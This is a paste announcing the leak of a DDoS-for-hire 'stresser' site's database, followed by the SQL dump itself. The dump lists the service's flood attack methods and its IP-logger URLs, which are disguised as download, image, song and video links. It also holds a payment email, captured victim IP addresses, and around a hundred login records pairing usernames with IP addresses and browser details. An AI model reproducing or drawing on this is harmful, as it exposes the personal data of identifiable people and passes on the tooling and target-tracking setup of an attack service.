· 6 years ago · Sep 30, 2019, 08:12 PM
1TXTG-TrainedKing - OWNER
2TXTGSTRESSER.COM DROPPED
3https://www.sendspace.com/file/9zwbtl
4------------------------------------------------------------------------------------
5-- phpMyAdmin SQL Dump
6-- version 4.2.12deb2+deb8u6
7-- http://www.phpmyadmin.net
8--
9-- Host: localhost
10-- Generation Time: Sep 23, 2019 at 06:40 PM
11-- Server version: 5.5.62-0+deb8u1
12-- PHP Version: 5.6.40-0+deb8u5
13
14SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
15SET time_zone = "+00:00";
16
17
18/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
19/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
20/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
21/*!40101 SET NAMES utf8 */;
22
23--
24-- Database: `ddoss`
25--
26
27-- --------------------------------------------------------
28
29--
30-- Table structure for table `blacklist`
31--
32
33CREATE TABLE IF NOT EXISTS `blacklist` (
34`ID` int(11) NOT NULL,
35 `IP` varchar(269) NOT NULL,
36 `note` text NOT NULL
37) ENGINE=MyISAM DEFAULT CHARSET=latin1;
38
39-- --------------------------------------------------------
40
41--
42-- Table structure for table `boot_methods`
43--
44
45CREATE TABLE IF NOT EXISTS `boot_methods` (
46 `method` varchar(32) NOT NULL,
47 `friendly_name` varchar(32) NOT NULL,
48 `active` enum('0','1') NOT NULL DEFAULT '1'
49) ENGINE=MyISAM DEFAULT CHARSET=latin1;
50
51--
52-- Dumping data for table `boot_methods`
53--
54
55INSERT INTO `boot_methods` (`method`, `friendly_name`, `active`) VALUES
56('ZAP', 'ZAP', '1'),
57('DNS', 'DNS', '1'),
58('BLUESYN', 'BLUESYN', '1'),
59('XMAS', 'XMAS', '1'),
60('SUDP', 'SUDP', '1'),
61('TILERA', 'TILERA', '1'),
62('OVH', 'OVH', '1'),
63('VSE', 'VSE', '1'),
64('REDSYN', 'REDSYN', '1'),
65('PROWIN', 'PROWIN', '1'),
66('WINSYN', 'WINSYN', '1'),
67('LDAP', 'LDAP', '1'),
68('SSDP', 'SSDP', '1'),
69('ACK', 'ACK', '1'),
70('WIZARD', 'WIZARD', '1'),
71('VOX', 'VOX', '1'),
72('PPTP', 'PPTP', '1'),
73('UBNT', 'UBNT', '1'),
74('TELNET', 'TELNET', '1'),
75('MAC', 'MAC', '1'),
76('MEMCACHED', 'MEMCACHED', '1'),
77('NTP', 'NTP', '1'),
78('DOMINATE', 'DOMINATE', '1'),
79('BO4BYPASS', 'BO4BYPASS', '1'),
80('FAST', 'FAST', '1'),
81('GREENSYN', 'GREENSYN', '1'),
82('BLAZIN', 'BLAZIN', '1'),
83('URG', 'URG', '1');
84
85-- --------------------------------------------------------
86
87--
88-- Table structure for table `fe`
89--
90
91CREATE TABLE IF NOT EXISTS `fe` (
92`ID` int(11) NOT NULL,
93 `userID` int(11) NOT NULL,
94 `type` varchar(1) NOT NULL,
95 `ip` varchar(15) NOT NULL,
96 `note` text NOT NULL
97) ENGINE=MyISAM DEFAULT CHARSET=latin1;
98
99-- --------------------------------------------------------
100
101--
102-- Table structure for table `gateway`
103--
104
105CREATE TABLE IF NOT EXISTS `gateway` (
106 `email` varchar(1024) NOT NULL
107) ENGINE=MyISAM DEFAULT CHARSET=latin1;
108
109--
110-- Dumping data for table `gateway`
111--
112
113INSERT INTO `gateway` (`email`) VALUES
114('breezy7984@gmail.com');
115
116-- --------------------------------------------------------
117
118--
119-- Table structure for table `iplogs`
120--
121
122CREATE TABLE IF NOT EXISTS `iplogs` (
123`ID` int(11) NOT NULL,
124 `userID` int(11) NOT NULL,
125 `logged` varchar(15) NOT NULL,
126 `date` int(11) NOT NULL
127) ENGINE=MyISAM DEFAULT CHARSET=latin1;
128
129-- --------------------------------------------------------
130
131--
132-- Table structure for table `loggers`
133--
134
135CREATE TABLE IF NOT EXISTS `loggers` (
136`logger_id` int(11) NOT NULL,
137 `address` varchar(256) NOT NULL
138) ENGINE=InnoDB AUTO_INCREMENT=6 DEFAULT CHARSET=latin1;
139
140--
141-- Dumping data for table `loggers`
142--
143
144INSERT INTO `loggers` (`logger_id`, `address`) VALUES
145(2, 'https://txtgstresser.com/download.php?id=%'),
146(3, 'https://txtgstresser.com/image.php?id=%'),
147(1, 'https://txtgstresser.com/logger.php?id=%'),
148(4, 'https://txtgstresser.com/song.php?id=%'),
149(5, 'https://txtgstresser.com/video.php?id=%');
150
151-- --------------------------------------------------------
152
153--
154-- Table structure for table `loggers_ips`
155--
156
157CREATE TABLE IF NOT EXISTS `loggers_ips` (
158`id` int(11) NOT NULL,
159 `logger_id` int(11) NOT NULL,
160 `ip` varchar(128) NOT NULL,
161 `date` int(16) NOT NULL
162) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=latin1;
163
164--
165-- Dumping data for table `loggers_ips`
166--
167
168INSERT INTO `loggers_ips` (`id`, `logger_id`, `ip`, `date`) VALUES
169(1, 1, '46.105.37.199', 1569034274),
170(2, 1, '2601:240:cf00:1499:f981:f848:dd8e:bdac', 1569142987);
171
172-- --------------------------------------------------------
173
174--
175-- Table structure for table `login_history`
176--
177
178CREATE TABLE IF NOT EXISTS `login_history` (
179`id` int(11) NOT NULL,
180 `username` varchar(75) NOT NULL,
181 `ip` varchar(128) NOT NULL,
182 `date` int(16) NOT NULL,
183 `http_agent` varchar(512) DEFAULT NULL
184) ENGINE=InnoDB AUTO_INCREMENT=119 DEFAULT CHARSET=latin1;
185
186--
187-- Dumping data for table `login_history`
188--
189
190INSERT INTO `login_history` (`id`, `username`, `ip`, `date`, `http_agent`) VALUES
191(7, 'txtgleader', '46.105.37.199', 1569031015, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
192(8, 'txtgleader', '46.105.37.199', 1569031367, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
193(9, 'undoxity', '145.239.212.33', 1569031716, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3918.0 Safari/537.36'),
194(10, 'undoxity', '145.239.212.33', 1569032045, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3918.0 Safari/537.36'),
195(11, 'TXTGNotLackin', '73.166.210.216', 1569032587, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
196(12, 'deonteworthen', '46.105.37.199', 1569032723, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),
197(13, 'TXTGNotLackin', '73.166.210.216', 1569032732, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
198(14, 'deonteworthen', '46.105.37.199', 1569032752, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),
199(15, 'DROPPEDWIFI25', '166.182.251.32', 1569032763, 'Mozilla/5.0 (Linux; Android 8.1.0; LM-Q710.FG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36'),
200(16, 'undoxity', '145.239.212.33', 1569032794, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3918.0 Safari/537.36'),
201(17, 'undoxitytest', '145.239.212.33', 1569032824, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3918.0 Safari/537.36'),
202(18, 'DROPPEDWIFI25', '166.182.251.32', 1569033095, 'Mozilla/5.0 (Linux; Android 8.1.0; LM-Q710.FG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36'),
203(19, 'undoxitytest', '145.239.212.33', 1569033218, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3918.0 Safari/537.36'),
204(20, 'undoxitytest', '145.239.212.33', 1569033274, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3918.0 Safari/537.36'),
205(21, 'undoxity', '145.239.212.33', 1569033370, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3918.0 Safari/537.36'),
206(22, 'Anonymous123', '185.245.86.52', 1569033784, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
207(23, 'harmz', '2600:1700:5510:cb90:6ddc:84f1:343f:4410', 1569034669, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
208(24, 'txtgleader', '46.105.37.199', 1569035899, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
209(25, 'txtgleader', '2607:fcc8:e080:bb00:84dd:d26:d530:eab7', 1569038818, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
210(26, 'DROPPEDWIFI25', '166.182.251.32', 1569042039, 'Mozilla/5.0 (Linux; Android 8.1.0; LM-Q710.FG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36'),
211(27, 'Ultraferrox', '2601:188:8280:1300:cc81:8250:6bcf:4578', 1569043887, 'Mozilla/5.0 (iPhone; CPU iPhone OS 13_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.1 Mobile/15E148 Safari/604.1'),
212(28, 'Chubu', '2600:387:2:803::92', 1569045098, 'Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Mobile/15E148 Safari/604.1'),
213(29, 'deonteworthen', '46.105.37.199', 1569045568, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),
214(30, 'undoxity', '145.239.212.33', 1569047720, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3918.0 Safari/537.36'),
215(31, 'iamtesting', '5.67.35.33', 1569053049, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),
216(32, 'iamtesting', '5.67.35.33', 1569053072, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),
217(33, 'iamtesting', '5.67.35.33', 1569056002, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),
218(34, 'iamtesting', '5.67.35.33', 1569060484, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),
219(35, 'iamtesting', '5.67.35.33', 1569066493, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),
220(36, 'txtgleader', '2607:fcc8:e080:bb00:c02b:537c:69cc:3007', 1569078895, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
221(37, 'iamtesting', '217.146.82.127', 1569079502, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),
222(38, 'InsanityBoii', '51.89.176.228', 1569079613, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),
223(39, 'iamtesting', '217.146.82.127', 1569082377, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),
224(40, 'CaronModzAll', '104.143.200.78', 1569084069, 'Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Mobile/15E148 Safari/604.1'),
225(41, 'deonteworthen', '108.73.111.98', 1569084711, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),
226(42, 'txtgleader', '54.36.24.157', 1569099101, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
227(43, 'TxtgH3ADSHOT', '2600:6c56:7d00:278:55b8:a792:d844:f854', 1569099916, 'Mozilla/5.0 (iPhone; CPU iPhone OS 13_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.1 Mobile/15E148 Safari/604.1'),
228(44, 'undoxitytest', '145.239.212.33', 1569101284, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3918.0 Safari/537.36'),
229(45, 'undoxity', '145.239.212.33', 1569101293, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3918.0 Safari/537.36'),
230(46, 'deonteworthen', '108.73.111.98', 1569103269, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),
231(47, 'undoxity', '145.239.212.33', 1569104288, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3918.0 Safari/537.36'),
232(48, 'txtgleader', '2607:fcc8:e080:bb00:c02b:537c:69cc:3007', 1569105557, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
233(49, 'TxtgH3ADSHOT', '2607:fb90:449a:dcdb:4922:780c:9eca:2f6d', 1569111197, 'Mozilla/5.0 (iPhone; CPU iPhone OS 13_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.1 Mobile/15E148 Safari/604.1'),
234(50, 'DROPPEDWIFI25', '166.182.249.118', 1569111746, 'Mozilla/5.0 (Linux; Android 8.1.0; LM-Q710.FG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36'),
235(51, 'Davezn6', '2600:1702:6e0:2650:c6f:ae6c:eed6:9e97', 1569112782, 'Mozilla/5.0 (Linux; Android 9; moto g(7) power) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36'),
236(52, 'txtgleader', '54.36.24.157', 1569112830, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
237(53, 'txtgH3ADSHOT', '2600:6c56:7d00:278:1d4a:a793:12d5:48a4', 1569114255, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763'),
238(54, 'CaronModzAll', '66.171.38.156', 1569114311, 'Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Mobile/15E148 Safari/604.1'),
239(55, 'deonteworthen', '108.73.111.98', 1569117521, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),
240(56, 'DROPPEDWIFI25', '166.182.249.118', 1569119174, 'Mozilla/5.0 (Linux; Android 8.1.0; LM-Q710.FG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36'),
241(57, 'treyyoung', '54.36.24.157', 1569119436, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134'),
242(58, 'txtgleader', '54.36.24.157', 1569119494, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
243(59, 'Txtgqueen', '2600:387:0:809::83', 1569120478, 'Mozilla/5.0 (Linux; Android 9; SM-G960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36'),
244(60, 'txtgleader', '54.36.24.157', 1569123958, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
245(61, 'treyyoung', '54.36.24.157', 1569125170, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134'),
246(62, 'TxtgH3ADSHOT', '2607:fb90:449a:dcdb:4922:780c:9eca:2f6d', 1569125854, 'Mozilla/5.0 (iPhone; CPU iPhone OS 13_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.1 Mobile/15E148 Safari/604.1'),
247(63, 'deonteworthen', '46.105.37.199', 1569128374, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),
248(64, 'txtgleader', '54.36.24.157', 1569133381, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
249(65, 'undoxitytest', '145.239.212.33', 1569133418, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3918.0 Safari/537.36'),
250(66, 'deonteworthen', '46.105.37.199', 1569133428, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),
251(67, 'undoxity', '145.239.212.33', 1569133429, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3918.0 Safari/537.36'),
252(68, 'deonteworthen', '107.242.117.64', 1569140863, 'Mozilla/5.0 (Linux; Android 7.0; LG-M430) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36'),
253(69, 'Frosty', '54.36.24.157', 1569163598, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763'),
254(70, 'txtgleader', '46.105.37.199', 1569164598, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
255(71, 'txtgleader', '46.105.37.199', 1569166568, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
256(72, 'txtgleader', '46.105.37.199', 1569169545, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
257(73, 'deonteworthen', '108.73.111.98', 1569171418, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),
258(74, 'DROPPEDWIFI25', '50.25.150.90', 1569182567, 'Mozilla/5.0 (Linux; Android 8.1.0; LM-Q710.FG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36'),
259(75, 'DROPPEDWIFI25', '50.25.150.90', 1569184041, 'Mozilla/5.0 (Linux; Android 8.1.0; LM-Q710.FG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36'),
260(76, 'txtgleader', '46.105.37.199', 1569185059, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
261(77, 'Frosty', '54.36.24.157', 1569189921, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763'),
262(78, 'txtgleader', '2607:fcc8:e080:bb00:8910:e1b1:6021:d200', 1569191193, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
263(79, 'Frosty', '54.36.24.157', 1569197213, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763'),
264(80, 'txtgleader', '2607:fcc8:e080:bb00:6d9e:d9eb:614f:528e', 1569197394, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
265(81, 'deonteworthen', '46.105.37.199', 1569197850, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),
266(82, 'txtgleader', '2607:fcc8:e080:bb00:6d9e:d9eb:614f:528e', 1569198587, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
267(83, 'V2680', '137.74.233.212', 1569199797, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),
268(84, 'Turn', '2a04:b2c2:1002:2f00:fd05:e1af:b1d9:aba3', 1569200225, 'Mozilla/5.0 (Linux; Android 9; SM-G950F Build/PPR1.180610.011; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/77.0.3865.92 Mobile Safari/537.36 Instagram 111.1.0.25.152 Android (28/9; 480dpi; 1080x2076; samsung; SM-G950F; dreamlte; samsungexynos8895; en_GB; 173238731)'),
269(85, 'V2680', '137.74.233.212', 1569200290, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),
270(86, 'treyyoung', '54.36.24.156', 1569203594, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134'),
271(87, 'txtgleader', '2607:fcc8:e080:bb00:6d9e:d9eb:614f:528e', 1569204672, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
272(88, 'ShalXBL', '69.125.125.67', 1569204838, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 OPR/63.0.3368.88'),
273(89, 'deonteworthen', '108.73.111.98', 1569205058, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),
274(90, 'Diamondshot', '2806:1000:8000:9875:c8d7:5a90:dc9f:1190', 1569207448, 'Mozilla/5.0 (Linux; Android 8.0.0; SAMSUNG SM-G930A) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/10.1 Chrome/71.0.3578.99 Mobile Safari/537.36'),
275(91, 'treyyoung', '54.36.24.156', 1569208958, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134'),
276(92, 'Vivian', '45.248.77.68', 1569210238, 'Mozilla/5.0 (Linux; Android 6.0.1; H715BL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36'),
277(93, 'treyyoung', '54.36.24.156', 1569211150, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134'),
278(94, 'txtgleader', '2607:fcc8:e080:bb00:6d9e:d9eb:614f:528e', 1569213025, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
279(95, 'Stadics', '24.205.187.219', 1569213785, 'Mozilla/5.0 (Linux; Android 8.1.0; SM-J727P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.73 Mobile Safari/537.36'),
280(96, 'treyyoung', '54.36.24.156', 1569215647, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134'),
281(97, 'txtgleader', '2607:fcc8:e080:bb00:6d9e:d9eb:614f:528e', 1569215945, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
282(98, 'DROPPEDWIFI25', '166.182.252.41', 1569216342, 'Mozilla/5.0 (Linux; Android 8.1.0; LM-Q710.FG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36'),
283(99, 'DROPPEDWIFI25', '166.182.252.41', 1569217271, 'Mozilla/5.0 (Linux; Android 8.1.0; LM-Q710.FG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36'),
284(100, 'CaronModzAll', '66.171.38.156', 1569218300, 'Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Mobile/15E148 Safari/604.1'),
285(101, 'TXTGNotLackin', '192.241.216.124', 1569245866, 'Mozilla/5.0 (Linux; Android 7.1.2; LM-X210VPP) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.73 Mobile Safari/537.36'),
286(102, 'txtgleader', '147.135.3.157', 1569249779, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
287(103, 'acaudill7', '104.230.200.9', 1569251181, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
288(104, 'loler44', '208.74.240.146', 1569251229, 'Mozilla/5.0 (X11; CrOS armv7l 12105.100.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.144 Safari/537.36'),
289(105, 'loler44', '208.74.240.146', 1569251300, 'Mozilla/5.0 (X11; CrOS armv7l 12105.100.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.144 Safari/537.36'),
290(106, 'tylerj101998', '108.254.47.244', 1569253098, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),
291(107, 'zxntrix', '91.134.250.85', 1569253262, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
292(108, 'BluesBros0511', '2606:a000:111e:e041:5c1:25f8:c3fe:2d5b', 1569253361, 'Mozilla/5.0 (iPhone; CPU iPhone OS 13_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0 Mobile/15E148 Safari/604.1'),
293(109, 'Uk720', '217.146.82.3', 1569253380, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),
294(110, 'Uk720', '217.146.82.3', 1569253476, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),
295(111, 'Uk720', '217.146.82.3', 1569253601, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),
296(112, 'txtgleader', '147.135.3.157', 1569255582, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
297(113, 'acaudill7', '104.230.200.9', 1569255936, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
